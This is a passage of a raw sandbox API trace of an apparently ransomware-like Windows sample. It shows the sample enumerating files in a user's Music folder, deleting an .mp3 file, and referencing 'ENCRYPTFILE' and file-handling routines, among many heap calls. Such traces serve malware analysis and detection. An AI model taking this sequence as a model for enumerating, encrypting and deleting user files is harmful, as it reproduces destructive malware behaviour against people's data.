lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3", lpFilePart=0x0) returned 0x39 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0111.568] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\7enkybcgm pjgaedelc.mp3")) returned 0x20 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0111.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0111.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5360 [0111.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a138 [0111.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0111.569] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x612d0730, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x33d059f0, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0x33d059f0, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x1eef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7eNkYBcGM pJGAedeLc.mp3", cAlternateFileName="7ENKYB~1.MP3")) returned 0x41ac280 [0111.569] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\7eNkYBcGM pJGAedeLc.mp3" (normalized: "c:\\users\\fd1hvy\\music\\9smmb260b1u\\7enkybcgm pjgaedelc.mp3")) returned 1 [0111.621] FindNextFileW (in: hFindFile=0x41ac280, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x612d0730, ftCreationTime.dwHighDateTime=0x1d5e2d5, ftLastAccessTime.dwLowDateTime=0x33d059f0, ftLastAccessTime.dwHighDateTime=0x1d5e3a1, ftLastWriteTime.dwLowDateTime=0x33d059f0, ftLastWriteTime.dwHighDateTime=0x1d5e3a1, nFileSizeHigh=0x0, nFileSizeLow=0x1eef, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="7eNkYBcGM pJGAedeLc.mp3", cAlternateFileName="7ENKYB~1.MP3")) returned 0 [0111.621] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0111.622] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0111.622] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4314a28 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f50 | out: hHeap=0x1780000) returned 1 [0111.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0111.623] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.623] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0111.623] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca028 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ea8 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0111.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0111.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23f0 | out: hHeap=0x1780000) returned 1 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9f50 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca130 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0111.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0111.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0111.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.624] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23f0 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0111.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0111.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0111.624] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\9sMMb260B1u\\bg_rcFiS42y.mp3", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ca2b470, ftCreationTime.dwHighDateTime=0x1d5ec0d, ftLastAccessTime.dwLowDateTime=0x94593bc0, ftLastAccessTime.dwHighDateTime=0x1d5ec5c, ftLastWriteTime.dwLowDateTime=0x94593bc0, ftLastWriteTime.dwHighDateTime=0x1d5ec5c, nFileSizeHigh=0x0, nFileSizeLow=0x10430, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="bg_rcFiS42y.mp3", cAlternateFileName="BG_RCF~1.MP3")) returned 0x41ac180 [0111.625] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0111.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0111.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0111.625] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0111.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391e70 | out: hHeap=0x1780000) returned 1 [0111.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0111.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca100 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0111.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca058 | out: hHeap=0x1780000) returned 1 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca058 [0111.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0111.626] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0111.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f68 | out: hHeap=0x1780000) returned 1 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0111.626] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0111.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0111.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24f0 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f68 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0111.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2410 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0111.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24b0 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2370 [0111.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2370 | out: hHeap=0x1780000) returned 1 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0111.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2370 [0111.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0111.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0111.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0111.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0111.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0111.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0111.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0111.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0111.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0111.628] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0111.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0111.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0111.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0111.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0111.629] HeapFree (in: hHeap=0x1780000, 